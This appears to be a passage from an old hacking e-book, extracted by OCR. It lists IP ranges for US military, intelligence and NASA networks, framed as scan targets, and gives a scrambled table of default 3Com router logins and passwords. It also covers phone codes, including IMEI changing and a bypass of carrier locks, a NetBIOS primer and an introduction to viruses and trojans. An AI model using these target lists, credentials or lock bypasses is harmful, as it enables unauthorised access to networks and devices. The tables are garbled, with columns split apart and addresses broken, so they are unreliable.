134.5.0.0 Lockheed Aeronautical Systems Company 134.11.0.0 134.12.0.0 134.51.0.0 134.52.*.* 134.78.0.0 134.80.0.0 134.118.0.0 134.131.0.0 134.136.0.0 134.164.0.0 134.165.0.0 134.194.0.0 134.205.0.0 134.229.0.0 134.233.0.0 134.235.0.0 134.240.0.0 136.149.0.0 RANGE 136 136.178.0.0 136.207.0.0 NASA Research Network Defense Intelligence Agency 74 69th Signal Battalion 136.188.0.0 - 136.197.255.255 The Pentagon NASA Ames Research Center Boeing Military Aircraft Facility Boeing Corporation Army Information Systems Command-ATCOM Army Information Systems Command NASA/Johnson Space Center Wright-Patterson Air Force Base Wright-Patterson Air Force Base Army Engineer Waterways Experiment Station Headquarters Air Force Space Command U.S. Army Aberdeen Test Center 7th Communications Group Navy Regional Data Automation Center U.S. Army, Europe HQ 5th Signal Command HQ 5th Signal Command U.S. Military Academy Air Force Military Personnel Center

134.232.0.0 - 134.232.255.255

136.208.0.0 136.209.0.0 136.210.0.0 136.212.0.0 136.213.0.0 136.214.0.0 136.215.0.0 136.216.0.0 136.217.0.0 136.218.0.0 136.219.0.0 136.220.0.0 136.221.0.0 136.222.0.0

HQ, 5th Signal Command HQ 5th Signal Command HQ 5th Signal Command HQ 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command

RANGE 137 137.1.0.0 37.2.0.0 137.3.0.0 137.5.0.0 137.6.0.0 137.11.0.0 137.12.0.0 137.24.0.0 137.29.0.0 137.67.0.0 Whiteman Air Force Base George Air Force Base Little Rock Air Force Base \ 437 CS/SC Air Force Concentrator Network Air Force Concentrator Network HQ AFSPC/SCNNC Air Force Concentrator Network Naval Surface Warfare Center First Special Operations Command Naval Warfare Assessment Center

137.4.0.0 - 137.4.255.255

137.17.* National Aerospace Laboratory

137.94.* Royal Military College 137.95.* Headquarters, U.S. European Command 137.126.0.0 USAF MARS 137.127.* Army Concepts Analysis Agency 137.128.* U.S. ARMY Tank-Automotive Command 75

137.130.0.0 137.209.0.0 137.210.0.0 137.211.0.0 137.212.0.0 137.231.0.0 137.232.0.0 137.233.0.0 137.234.0.0 137.235.0.0 137.240.0.0 137.241.0.0 137.242.0.0 137.243.0.0 137.244.0.0 137.245.0.0 137.246.0.0

Defense Information Systems Agency Defense Information Systems Agency Defense Information Systems Agency Defense Information Systems Agency Defense Information Systems Agency HQ 5th Signal Command Defense Information Systems Agency Defense Information Systems Agency Defense Information Systems Agency Defense Information Systems Agency Air Force Materiel Command 75 ABW Air Force Logistics Command 77 CS/SCCN 78 CS/SCSC Wright Patterson Air Force Base United States Atlantic Command Joint Training

RANGE 139 39.31.0.0 139.32.0.0 139.33.0.0 139.34.0.0 139.35.0.0 139.36.0.0 139.37.0.0 139.38.0.0 139.40.0.0 139.41.0.0 139.42.0.0 139.43.0.0 20th Tactical Fighter Wing 48th Tactical Fighter Wing 36th Tactical Fighter Wing 52nd Tactical Fighter Wing 50th Tactical Fighter Wing 66th Electronic Combat Wing 26th Tactical Reconnaissance Wing | 32nd Tactical Fighter Squadron 10th Tactical Fighter Wing 39th Tactical Air Control Group 40th Tactical Air Control Group 401st Tactical Fighter Wing

139.124.* Reseau Infomratique 76

RANGE 143 143.45.0.0 143.46.0.0 143.68.0.0 143.69.0.0 143.70.0.0 143.71.0.0 143.72.0.0 143.73.0.0 143.74.0.0 143.75.0.0 143.76.0.0 143.77.0.0 143.78.0.0 143.79.0.0 143.80.0.0 143.81.0.0 143.82.0.0 143.84.0.0 143.85.0.0 143.86.0.0 143.87.0.0 143.232.0.0 RANGE 144 144.99.0.0 144.109.0.0 144.143.0.0 144.144.0.0 144.146.0.0 144.147.0.0 144.170.0.0 144.192.0.0 144.233.0.0 United States Army Information Systems Command Army Information Systems Command Headquarters, Third United States Army Headquarters, Third United States Army Commander, Army Information Systems Center Commander, Army Information Systems Center HQ, 5th Signal Command United States Army Information Services Command-Campbell Defense Intelligence Agency 77 58th Signal Battalion U.S. Army, 1141st Signal Battalion Headquarters, USAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC Headquarters, USAAISC NASA Ames Research Center

144.234.0.0 144.235.0.0 144.236.0.0 144.237.0.0 144.238.0.0 144.239.0.0 144.240.0.0 144.241.0.0 144.242.0.0 144.252.0.0 RANGE 146 146.17.0.0 146.80.0.0 146.98.0.0 46.154.0.0 146.165.0.0 RANGE 147 147.35.0.0 147.36.0.0 147.37.0.0 147.38.0.0 147.39.0.0 147.40.0.0 147.42.0.0 147.103.0.0 147.104.0.0 147.159.0.0 147.168.0.0 147.169.0.0 147.198.0.0 147.199.0.0 47.238.0.0

Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency Defense Intelligence Agency U.S. Army LABCOM

HQ, 5th Signal Command Defence Research Agency HQ United States European Command NASA/Johnson Space Center NASA Langley Research Center

HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command HQ, 5th Signal Command Army CALS Project Army Information Systems Software Center Army Information Systems Software Center Naval Air Warfare Center, Aircraft Division Naval Surface Warfare Center HQ, 5th Signal Command Army Information Systems Command Army Information Systems Command Army Information Systems Command 78

147.239.0.0 147.240.0.0 147.242.0.0 147.248.0.0 147.254.0.0 RANGE 148 148.114.0.0 RANGE 150 150.113.0.0 150.114.0.0 150.125.0.0 150.133.0.0 150.144.0.0 150.149.0.0 150.157.0.0 150.184.0.0 150.190.0.0 150.196.0.0 RANGE 152 152.82.0.0 152.151.0.0 152.152.0.0 152.154.0.0 152.229.0.0 RANGE 153 153.21.0.0 153.22.0.0 153.28.0.0 153.29.0.0 153.30.0.0

1112th Signal Battalion US Army Tank-Automotive Command 19th Support Command Fort Monroe DOIM 7th Communications Group

NASA, Stennis Space Center

1114th Signal Battalion 1114th Signal Battalion Space and Naval Warfare Command 10th Area Support Group NASA Goodard Space Flight Center Army Information Systems Command USAISC-Fort Lee Fort Monroe DOIM USAISC-Letterkenny USAISC-LABCOM

7th Communications Group of the Air Force U.S. Naval Space & Naval Warfare Systems Command NATO Headquarters Defense Information Systems Agency Defense MegaCenter (DMC) Denver

USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM USCENTAF/SCM 79

153.31.0.0 RANGE 155 155.5.0.0 155.6.0.0 155.77.0.0 155.78.0.0 155.79.0.0 155.80.0.0 155.81.0.0 155.82.0.0 155.83.0.0 155.84.0.0 155.85.0.0 155.86.0.0 155.87.0.0 155.88.0.0 155.96.0.0 155.149.0.0 155.155.0.0 155.178.0.0 155.213.0.0 155.214.0.0 155.215.0.0 155.216.0.0 155.217.0.0 155.218.0.0 155.219.0.0 155.220.0.0 155.221.0.0 RANGE 156 156.9.0.0

Federal Bureau of Investigation

1141st Signal Bn 1141st Signal Bn PEO STAMIS PEO STAMIS US Army Corps of Engineers PEO STAMIS PEO STAMIS PEO STAMIS US Army Corps of Enginers PEO STAMIS PEO STAMIS US Army Corps of Engineers PEO STAMIS PEO STAMIS Drug Enforcement Administration 1112th Signal Battalion HQ, 5th Signal Command \ Federal Aviation Administration USAISC Fort Benning Director of Information Management USAISC-FT DRUM TCACCIS Project Management Office Directorate of Information Management USAISC DOIM/USAISC Fort Sill USAISC-DOIM USAISC-Ft Ord

U. S. Marshals Service 80

RANGE 158 158.1.0.0 58.2.0.0 158.3.0.0 158.6.0.0 158.8.0.0 158.9.0.0 158.10.0.0 158.11.0.0 158.12.0.0 158.13.0.0 158.14.0.0 158.16.0.0 158.17.0.0 158.18.0.0 158.19.0.0 158.20.0.0 158.235.0.0 158.243.0.0 158.244.0.0 158.245.0.0 158.246.0.0 RANGE 159 159.120.0.0 Naval Air Systems Command (Air 4114) Commander, Tooele Army Depot USAMC Logistics Support Activity U.S. Army TACOM USAISC-Ft. McCoy US Army Soldier Support Center USAISC-CECOM GOC UASISC-Vint Hill US Army Harry Diamond Laboratories USAISC DOIM 1112th Signal Battalion Rocky Mountain Arsenal (PMRMA) Crane Army Ammunition Activity Defense Finance & Accounting Service Center DOIM DOIM Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity Marine Corps Central Design and Programming Activity

RANGE 160 160.132.0.0 |160.135.0.0 160.138.0.0 160.139.0.0 160.140.0.0 160.143.0.0 US Army Recruiting Command 36th Signal BN USAISC USAISC HQ, United States Army USAISC 81

160.145.0.0 160.146.0.0 160.150.0.0 RANGE 161 161.124.0.0 RANGE 162 162.32.0.0 162.45.0.0 162.46.0.0 RANGE 163 163.205.0.0 163.206.0.0 RANGE 164 164.45.0.0 164.49.0.0 164.158.0.0 164.217.0.0 164.223.0.0 164.224.0.0 164.225.0.0 164.226.0.0 164.227.0.0 164.228.0.0 164.229.0.0 164.230.0.0 164.231.0.0

1101st Signal Brigade USAISC SATCOMSTA-CAMP ROBERTS Commander, Moncrief Army Hospital

NAVAL WEAPONS STATION

Naval Aviation Depot Pensacola Central Intelligence Agency Central Intelligence Agency |

NASA Kennedy Space Center NASA Kennedy Space Center

Naval Ordnance Center, Pacific Division United States Army Space and Strategic Defense Naval Surface Warfare Center Institute for Defense Analyses Naval Undersea Warfare Center \ Secretary of the Navy U.S. Army Intelligence and Security Command Naval Exchange Service Command Naval Surface Warfare Center, Crane Division USCINCPAC J21T NCTS-NOLA Naval Aviation Depot Military Sealift Command

RANGE 167 167.44.0.0 Government Telecommunications Agency 82

RANGE 168 168.68.0.0 168.85.0.0 168.102.0.0 USDA Office of Operations Fort Sanders Alliance Indiana Purdue Fort Wayne

RANGE 169 169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 195 195.10.* Various - Do not scan RANGE 199 199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA RANGE 203 203.59.0.0 - 203.59.255.255 Perth Australia iiNET RANGE 205 205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR 205.96.* - 205.103.* RANGE 207 207.30.* Sprint/United Telephone of Florida

Back

83

Default Router Password

84

Manufacturer 3Com 3Com 3Com 3Com 3Com 3Com 3Com 3com

Model OS VersionLogin 1.25 root Super Stack 2 Switch Any manager AccessBuilder 7000 Any BRI CoreBuilder 2500 Switch 3000/3300 manager admin Switch 3000/3300 Switch 3000/3300 security Cable Managment Win2000 & System SQL Database DOCSIS_APP MS (DOSCIC DHCP) NAC (Network Access adm Card) v4.1.x of HiPer ARC Card adm HA CoreBuilder 6000 debug CoreBuilder 7000 tech SuperStack II Switch debug 2200 SuperStack II Switch tech 2700 SuperStack / CoreBuilder admin SuperStack / CoreBuilder read SuperStack / CoreBuilder write LinkSwitch and CellPlex tech LinkSwitch and CellPlex debug Superstack II 3300FX admin Switch 3000/3300 Admin 3comCellPlex7000 tech Switch 3000/3300 monitor AirConnect Access Point n/a Superstack II Dual Speed security 500 OfficeConnect 5x1 at least 5.x SuperStack 3 Switch admin 3300XM Super Stack 2 Switch Any manager SuperStack II Switch manager 1100 SuperStack II Switch security 1100 super stack 2 switch any manager Office Connect Remote root 812 Switch 3000/3300 admin root administrator User estheralastruey

Password letmein manager manager admin security 3com

3Com 3Com 3Com 3Com 3Com 3Com 3Com 3Com 3Com 3Com 3Com 3com 3com 3com 3Com 3Com 3com 3Com 3Com 3com 3Com 3Com 3com 3Com 3Com 3COM 3com 3com 3com 3Com

none none tech tech synnet tech tech synnet 3com tech monitor comcomcom security PASSWORD manager manager security manager !root admin !root 0000 Password -

OCR-812 NBX100 2.8 85 Home Connect OfficeConnect 5x1 at least 5.x SuperStack II Switch

Back

86

Understanding NetBIOS
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking services. NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs. It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them. NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN enviroment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below. PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session. 87

All communication in these enviroments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively. NetBIOS is a very common protocol used in todays enviroments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time. In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means. NetBIOS can consist of up to 16 aplhanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name. When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows: 1. Uppon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information. 2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name. 3. If no other client on the network objects to the name registration, the client will finish the registration process. There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all 88

processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node. The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service. [QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above] The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format. Name ======== <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> <computername> 00 01 03 06 1F 20 21 22 23 24 30 31 43 44 45 46 4C U U G U U U U U U U U U U U U U U U 89 Workstation Service Messenger Service Master Browser Messenger Service RAS Server Service NetDDE Service File Server Service RAS Client Service Exchange Interchange Exchange Store Exchange Directory Modem Sharing Server Service Modem Sharing Client Service SMS Client Remote Control SMS Admin Remote Control Tool SMS Client Remote Chat SMS Client Remote Transfer DEC Pathworks TCPIP Service Number Type Usage

==================================================================

<\\_MSBROWSE_> 01

<computername> <computername> <computername> <computername> <computername> <username> <domain> <domain> <domain> <domain> <domain> <INet~Services> <computername> IRISMULTICAST

52 87 6A BE BF 03 00 1B 1C 1D 1E 1C 00 [2B] [2F]

U U U U U U G U G U G G U U G G U

DEC Pathworks TCPIP Service Exchange MTA Exchange IMC Network Monitor Agent Network Monitor Apps Messenger Service Domain Name Domain Master Browser Domain Controllers Master Browser Browser Service Elections Internet Information Server Internet Information Server Lotus Notes Server Lotus Notes Lotus Notes DCA Irmalan Gateway Service

<IS~Computer_name>

IRISNAMESERVER [33] Forte_$ND800ZA [20]

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique. Group (G): A normal group; the single name may exist with many IP addresses. Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25. Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names. Domain Name (D): New in NT 4.0 For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

90

NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded. The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded. NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user 91

interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different. Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.

NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.

Back
92

93

Mobile hacking
Nokia 2110/I is codes shows you software version, software date and hardware model number of your phone. On 2110, type: * # 9999 # On 2110i, may function one of the followings: * # 170602112302 # or * # 682371158412125 #

Show IMEI code


If you need to know what's the IMEI code of your phone, simply press: * # 06 # you'll read it on display.

Change IMEI code


If you want to change IMEI code of your phone (we don't want to know "why"), here is the software you'll need.

Show manufact. date


To get the manufacturing date of your phone, press: * # 3283 # (= *#date#) in 1995 phones, date is in "mmyy" format, 1996 and later phones show date in "wwyy" format.

Unlock SP lock
Here is a way to Unlock your phone which is Service Provider locked, without to know 94

SPLock code !!!! Give it a try (and give us feedback, pls): Turn the phone on, when the phone asks for the Security Code, press: 112 <send> now quickly press: # send end send end. Each time you turn your phone OFF it resets the lock, so this need to be done each time you'll turn your phone ON :-( Anyway it's better than nothing, isn't it?

Pin-Out

ANT 16 9 Charging connector (O) I-I-I-I-I-I-I-I ( ) ( o ) CON 8 1 The left symbol (O) is the antenna connector for car kits. The symbol numbered 16-9 on the top and 8-1 on the bottom is the system connector. the ( ) is the open space next to the connector and the ( o ) is the charging connector for you home-charger.

PIN Description
1 - Digital ground 95

2 - External audio input from accessories or handsfree microphone. Multiplexed with junction box connection control signal 3 - Analogue ground for accessories 4 - Transmitted DBUS data to the accessories 5 - Serial Bidirectional data between the phone and accessories 6 - Hook indication. HP has a 100KE pull-up resistor. 7 - Handsfree device power on/off, data to flash programming device. 8 - Battery charging voltage 9 - Digital ground 10 - External Audio output to accessories or handsfree speaker 11 - DBUS data bit sync clock 12 - DBUS recieved data from the accessories 13 - Power supply to headset adapter 14 - Programming voltage for FLASH 15 - DBUS data clock 16 - Battery charging voltage

Software Bug
Software version prior ver. 5.48 may randomly reset and restart itself, it seems to be fixed in later version For: Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700 IMEI *#06# displays IMEI on 8700, NOT on 6200, 7500, 8200 To activate RBS: (pause means the * key held in until box appears) [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok] You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it. 96

To de-activate RBS, [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok] This only works with some versions of software. Please report what works and doesn't for you. Reported working, by country: d460: IT 6200 Flare: UK (Orange), AU 7500: IT (model: F16 HW: 5.2 SW: 2.1) 8200: ES, AU, NL, BE 8400: IT, NL 8700: AU, IT, SG, DE, ES, ZA

Uses of RBS:
Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters. Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.

Back

97

98

Viruses

Index

Introduction to Computer Viruses History Why Do People Write Viruses Virus Code
Back

99

100

Introduction to Computer Viruses


The person might have a computer virus infection when the computer starts acting differently. For instance getting slow or when they turn the computer on, it says that all the data is erased or when they start writing a document, it looks different, some chapters might be missing or something else abnormal has happened. The next thing usually the person whose computer might be infected with virus, panics. The person might think that all the work that has been done is missing. That could be true, but in most cases viruses have not done any harm jet, but when one start doing something and are not sure what you do, that might be harmful. When some people try to get rid of viruses they delete files or they might even format the whole hard disk like my cousin did. That is not the best way to act when the person think that he has a virus infection. What people do when they get sick? They go to see a doctor if they do not know what is wrong with them. It is the same way with viruses, if the person does not know what to do they call someone who knows more about viruses and they get professional help. If the person read email at their PC or if they use diskettes to transfer files between the computer at work and the computer at home, or if they just transfer files between the two computers they have a good possibility to get a virus. They might get viruses also when they download files from any internet site. There was a time when people were able to be sure that some sites we secure, that those secure sites did not have any virus problems, but nowadays the people can not be sure of anything. There has been viruses even in Microsoft's download sites. In this report I am going to introduce different malware types and how they spread out and how to deal with them. Most common viruses nowadays are macro viruses and I am going to spend a little more time with them. I am going to give an example of trojan horses stealing passwords. Comparison with biological viruses

How viruses work


A computer virus will pass from one computer to another like a real life biological virus passes from person to person. For example, it is estimated by experts that the [Mydoom] worm infected a quarter-million computers in a single day in January 2004.Another example is the ILOVEYOU virus, which occurred in 2000 and had a similar effect. It stole most of its operating style from Melissa. There are tens of thousands of viruses out there, and new ones 101

are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all have variations in the way they infect the way they spread. So instead, weve taken some broad categories that are commonly used to describe various types of virus.

Basic types of viruses


File viruses (parasitic viruses)
File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and are activated when the host program is run. After activation, the virus may spread itself by attaching itself to other programs in the system, and also carry out the malevolent activity it was programmed for. Most file viruses spread by loading themselves in system memory and looking for any other programs located on the drive. If it finds one, it modifies the programs code so that it contains and activates the virus the next time its run. It keeps doing this over and over until it spreads across the system, and possibly to other systems that the infected program may be shared with. Besides spreading themselves, these viruses also carry some type of destructive constituent that can be activated immediately or by a particular trigger. The trigger could be a specific date, or the number of times the virus has been replicated, or anything equally trivial. Some examples of file viruses are Randex, Meve and MrKlunky.

Boot sector viruses


A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating system to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence. A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, the boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading. Though boot viruses still exist, they are rare compared to new-age malicious software. Another reason why theyre not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.

102

Multipartite viruses
Multipartite viruses are a combination of boot sector viruses and file viruses. These viruses come in through infected media and reside in memory. They then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system. There arent too many multipartite viruses in existence today, but in their heyday, they accounted for some major problems due to their capacity to combine different infection techniques. A significantly famous multipartite virus is Ywinz. Macro Viruses hat contain macros. These include Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations, Access databases, and other similar application files such as Corel Draw, AmiPro, etc. Since macro viruses are written in the language of the application, and not in that of the operating system, they are known to be platform-independentthey can spread between Windows, Mac, and any other system, so long as theyre running the required application. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over net-works, these viruses are major threats. The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today, there are thousands of macro viruses in existence some examples are Relax, Melissa.A and Bablas.

Network viruses
This kind of virus is proficient in quickly spreading across a Local Area Network (LAN) or even over the Internet. Usually, it propagates through shared resources, such as shared drives and folders. Once it infects a new system, it searches for potential targets by searching the network for other vulnerable systems. Once a new vulnerable system is found, the network virus infects the other system, and thus spreads over the network. Some of the most notorious network viruses are Nimda and SQLSlammer. E-mail Viruses An e-mail virus could be a form of a macro virus that spreads itself to all the contacts located in the hosts email address book. If any of the e-mail recipients open the attachment of the infected mail, It spreads to the new hosts address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses can infect hosts even if the infected e-mail is previewed in a mail client. There are many ways in which a virus can infect or stay dormant on your PC. However, whether active or dormant, its dangerous to let one loose on your system, and should be dealt with immediately.

103

Other malicious software


]Earlier, the only way a computer was at risk was when you inserted an infected floppy. With the new age of technology, every computer is interconnected to the rest of the world at some point or the other, so its difficult to pinpoint the source and/or time of the infection. As if that werent bad enough, new-age computing has also brought about a new breed of malicious software. Today, the term virus has become a generic term used for all the different ways that your computer can be attacked by malicious software. Besides the type of viruses we mentioned heres a look at some of the newer problems we face today.

Trojan horses
The biggest difference between a Trojan horseor Trojanand a virus is that Trojans dont spread themselves. Trojan horses disguise themselves as useful software available for down-load on the Internet, and nave users download and run them only to realise their mistake later. A Trojan horse is usually divided into two partsa server and a client. Its the client that is cunningly disguised as important soft-ware and placed in peer-to-peer file sharing networks, or unofficial download sites. Once the client runs on your system, the attackerthe person running the serverhas a high level of control over your system, which can lead to devastating effects depending on the attackers intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the other. We have categorized them roughly into the following:

Remote access Trojans


These are the most commonly available Trojans. These give an attacker complete control over the victims computers. The attacker can go through the files and access any personal information about the user that may be stored in the files, such as credit card numbers, passwords, and important financial documents.

Password-Sending Trojans
The purpose of such Trojans is to copy all cached passwords and look for other passwords as you enter them, and send them to specific mail address, without the users knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail services come under direct threat with this kind of Trojan. 104

Keyloggers
These log victims keystrokes and then send the Logs to the attacker. The attacker then searches for passwords or other sensitive data in the log files. Most of them come with two functions, such as online and offline recording. Of course, they can be configured to send the log file to a specific-mail address on a daily basis

Destructive
The only function of these Trojans is to destroy and delete files. They can automatically delete all the core system files on your machine. The Trojan could be Controlled by the attacker or could be programmed to strike like logic bomb-starting on a specific day or at specific hour. The main idea behind Denial of Service (DoS) Attack Trojans is to generate a lot of internet traffic on the victims machine, to the extent that the Internet connection is too overloaded to let the user visit a website or download anything. Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail addresses with random subjects and contents that cannot be filtered. Proxy/Wingate Trojans These types of Trojan turn the victims computer into a proxy/wingate server. That way, the infected computer is available to the whole world to be used for anonymous access to various risky Internet services. The attacker can register domains or access pornographic Web sites with stolen credit cards or do similar illegal activities without being traced. FTP Trojans These trojans are probably the most simple, and are outdated. The only thing they do is open port 21the port for FTP transfersand let everyone connect to your machine. Newer versions are passwordprotected, so only 